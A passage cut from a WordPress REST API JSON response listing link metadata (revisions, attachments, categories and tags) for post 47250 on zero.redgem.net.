ersion-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47250\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=47250"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=47250"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=47250"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}